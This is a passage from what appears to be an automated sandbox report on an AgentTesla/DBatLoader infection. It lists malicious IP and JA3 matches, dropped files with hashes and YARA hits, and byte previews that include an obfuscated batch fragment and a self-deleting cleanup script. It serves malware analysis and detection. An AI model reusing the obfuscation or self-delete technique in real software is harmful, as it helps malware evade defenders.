	https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46atMmRo3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbmy4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v7LR3jPEjzYXr2LwuykYQnzvV6boWlogU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A	Get hash	malicious	Unknown	Browse	198.252.106.147
OVHFR	Preventivo#09678.exe	Get hash	malicious	RedLine	Browse	193.70.111.186
	SecurityHealthService.exe	Get hash	malicious	AsyncRAT, DarkTortilla, XWorm	Browse	213.32.110.214
	meerkat.ppc.elf	Get hash	malicious	Mirai	Browse	144.2.61.131
	QUOTATION#09678.exe	Get hash	malicious	RedLine	Browse	193.70.111.186
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	neworigin.exe	Get hash	malicious	AgentTesla	Browse	51.195.88.199
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	https://sharepoint-business.com/?rid=eprRhgr	Get hash	malicious	Unknown	Browse	51.178.43.144
	http://matomo.uk.oxa.cloud	Get hash	malicious	Unknown	Browse	51.195.180.103
	zgp.elf	Get hash	malicious	Mirai	Browse	51.222.237.206

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://uxfol.io/p/b02d8c67/029f480a	Get hash	malicious	Unknown	Browse	104.26.12.205
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	104.26.12.205
	https://bonzibuddy.org/Bonzi.zip	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://wetransfer.com/downloads/dfae2da4024c0a427ba385707deb5ffa20240620022822/9659fc	Get hash	malicious	Unknown	Browse	104.26.12.205
	Company Profile_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.26.12.205
	SUNNY (1).exe	Get hash	malicious	MassLogger RAT	Browse	104.26.12.205
	SFL OP990M3 PO.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.26.12.205
	http://junocis.com	Get hash	malicious	Unknown	Browse	104.26.12.205
	SecurityHealthService.exe	Get hash	malicious	AsyncRAT, DarkTortilla, XWorm	Browse	104.26.12.205
	FIZETESI.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.12.205
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	EditLoc.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	lavi.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse	198.252.105.91
	Loader.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	Updatev4_5.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	apptext.dll.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse	198.252.105.91

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\lxsyrsiW.pif	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse
	r876789878767.cmd	Get hash	malicious	DBatLoader, FormBook	Browse
	2tKeEoCCCw.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse
	z1Transaction_ID_REF2418_cmd.bat	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	5.2777664154104835
Encrypted:	false
SSDEEP:	12288:mImGUcsvZZdubv7hfl3CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlSsqjnhMgeiCl7G0nehbGZpbD
MD5:	664D172495F217F5E97FEF6698AE074C
SHA1:	C6AAB671D5255E214AAC87DC919325F191CE881D
SHA-256:	5FDB7A5D9F7BE97A981C8F598A0902437397ED063C15093264053AA4C3922A99
SHA-512:	231D16CB0BE2466567618E96D71F9F2B46A41B808CC6E541CD9ADB72FFB57912B59D6174031A4A1470963DF220CC7144A5C95995219F9B5A8E6CC736BA9A186B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

C:\Users\Public\Libraries\PNO

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Ovn:Ovn
MD5:	89B289543B1801050A1FA5F665682F9B
SHA1:	F01FC9F97420AD6AEAF09BE80D1D9BA5B69C4A19
SHA-256:	ABCA10E5C0FF2B657C09CD50D7AA667175FE7A1402550D6C43547EBF49FA71D6
SHA-512:	216E44DAC574B670E8BDE073574316C58145C7AF6A89506534FE67E82C3D4DFDC5EBE39AC9C13181C6EC1F846ECB9ABADAAB6BD9FB7C3F03AE3524223D79733A
Malicious:	false
Preview:	86..

C:\Users\Public\Libraries\Wisrysxl

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	data
Category:	dropped
Size (bytes):	1921890
Entropy (8bit):	7.398856770638502
Encrypted:	false
SSDEEP:	49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBlZ:ULhRGYHKOBlZ
MD5:	34E82F30B12F324DB1D2604CFA91CBB2
SHA1:	20001D49CD86B776EE8072A07F536B7330A77F97
SHA-256:	F1821B6BA4856A51354BEED61C0F325D39901D70F9FF1792A63758FFEA32FCEF
SHA-512:	47ADC8F19359C4DC9E073C7A464E3F5F0367AC6A06BB6AA741AA06FE8BD762ADB86304415623FB411E69CACC573E66E6397689C47B7291747E057E5BF001C1C1
Malicious:	true
Preview:	...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.

C:\Users\Public\Libraries\Wisrysxl.PIF

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1224192
Entropy (8bit):	6.917641485036678
Encrypted:	false
SSDEEP:	24576:Trd1nILlwmOWmdsNMRyHfeKx2b9O0xOaHAgfctN:TraaxkOb9XxOaHAgfctN
MD5:	86EE0E8789E9C11F707D056C4052292E
SHA1:	E14A7C7C230EFEEC03D671A91ECE4EDE1799F899
SHA-256:	A3992C7D83574EF92D815F6102721F33CFAE92461F518ACC4196A1EE5AD3EDE7
SHA-512:	4A6A8DC4FB82483B8297BF4199CCCFD4A1C32CF52CDAD42EB0E015ABBA815A29BF3123D65BD8EA4E8C6EFC630B7D7DCB9EE192F141514C8BA48E52A47D7C88EF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..................................... ....@..........................P...................@...............................(......................................................................................T............................text............................... ..`.itext..\|........................... ..`.data...P6... ...8..................@....bss.....6...`.......8...................idata...(..........8..............@....tls....4............b...................rdata...............b..............@..@.reloc...............d..............@..B.rsrc...............................@..@.............P......................@..@................................................................................................

C:\Users\Public\Libraries\lxsyrsiW.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:	dropped
Size (bytes):	62357
Entropy (8bit):	4.705712327109906
Encrypted:	false
SSDEEP:	768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:	B87F096CBC25570329E2BB59FEE57580
SHA1:	D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:	D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:	72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:	false
Preview:	@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

C:\Users\Public\Libraries\lxsyrsiW.pif

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.328046551801531
Encrypted:	false
SSDEEP:	1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5:	C116D3604CEAFE7057D77FF27552C215
SHA1:	452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256:	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512:	9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: x.exe, Detection: malicious, Browse Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse Filename: NEOMS_EOI_FORM.GZ, Detection: malicious, Browse Filename: r876789878767.cmd, Detection: malicious, Browse Filename: 2tKeEoCCCw.exe, Detection: malicious, Browse Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious, Browse Filename: E_dekont.cmd, Detection: malicious, Browse Filename: z1Transaction_ID_REF2418_cmd.bat, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

C:\Users\Public\Wisrysxl.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.087318387440537
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxsvcPS:HRYFVmTWDyzPtZExfPS
MD5:	5960D3AAE90BDE057FA91551BBCD38EC
SHA1:	1CD8C9AC0E85F492852E167C9513B9D84BB5D2F7
SHA-256:	FCB9F2AB41017FB82E18DF5610F8B106134A992D719572D95AC7EE40E19DF15A
SHA-512:	A8856D8823950B1D0291D95AC4FD7EFD7BA5F1629E6703C215D0319C17677F13817259A5B6F67F170F5B263795AD5F680A8EA51F457AD05035B4D0E010CD5B6C
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=923980..HotKey=91..

C:\Users\Public\alpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	236544
Entropy (8bit):	6.4416694948877025
Encrypted:	false
SSDEEP:	6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:	4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:	4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:	80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugei/ZPUyus:fLHxvIIwLgZ2KRHWLOugss
MD5:	AE6DF85157F6BF3C6D9A1FF77B6B442B
SHA1:	16EFB3DD6B191D135EBB0D3E01C0B86EA3E7DFEC
SHA-256:	807D3BFCD4C81BBB6C2FA2A9D79D08CB3040DB48512304EA5ADEF746DAD879AE
SHA-512:	0DA4437659BC9636F6EC248C482935ADDAD8DB2FC69F5F663553D0ED10D6A955B2CF6C8661ED9E6135DC64D3FE6895EC88443B5C7C947B2B08EB291193670C7E
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24xwvtxe.vv5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3irisxfs.ruj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kvgf3cm.xwb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sherlbhu.jo4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\neworigin.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	250368
Entropy (8bit):	5.008874766930935
Encrypted:	false
SSDEEP:	3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
MD5:	D6A4CF0966D24C1EA836BA9A899751E5
SHA1:	392D68C000137B8039155DF6BB331D643909E7E7
SHA-256:	DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
SHA-512:	9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.\|........................................

C:\Users\user\AppData\Local\Temp\server_BTC.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	164
Entropy (8bit):	5.0274413878335125
Encrypted:	false
SSDEEP:	3:mKDDCMNvFbuov3DUkh4E2J5xAIJWAdEFKDwU1hGDUkh4E2J5xAInTRI2USHoLfBT:hWKdbuoL923fJWAawDNe923fTXU5
MD5:	333872A6A5F57D90FEF81984EF2DA7FD
SHA1:	51CE51C029D0F5CE1F6F0B8B4E29535734DEDB90
SHA-256:	FFC8C0DCBDF0C254AE2ADCDBB57860A603C9228879D7FA0301984077B315431C
SHA-512:	0855BC90CB894941D3E520CA7B0A49814E26E213EA1558A6DF1AE99E30CB39617E0274D022A13704F366211BCCEAC22454342D4CEDAB06F61B8B044160367B49
Malicious:	false
Preview:	@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp9170.tmp.cmd" /f /q..

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1224192
Entropy (8bit):	6.917641485036678
Encrypted:	false
SSDEEP:	24576:Trd1nILlwmOWmdsNMRyHfeKx2b9O0xOaHAgfctN:TraaxkOb9XxOaHAgfctN
MD5:	86EE0E8789E9C11F707D056C4052292E
SHA1:	E14A7C7C230EFEEC03D671A91ECE4EDE1799F899
SHA-256:	A3992C7D83574EF92D815F6102721F33CFAE92461F518ACC4196A1EE5AD3EDE7
SHA-512:	4A6A8DC4FB82483B8297BF4199CCCFD4A1C32CF52CDAD42EB0E015ABBA815A29BF3123D65BD8EA4E8C6EFC630B7D7DCB9EE192F141514C8BA48E52A47D7C88EF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..................................... ....@..........................P...................@...............................(......................................................................................T............................text............................... ..`.itext..\|........................... ..`.data...P6... ...8..................@....bss.....6...`.......8...................idata...(..........8..............@....tls....4............b...................rdata...............b..............@..@.reloc...............d..............@..B.rsrc...............................@..@.............P......................@..@................................................................................................

C:\Users\user\AppData\Roaming\34f23828e93cca9c.bin

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.983703099277698
Encrypted:	false
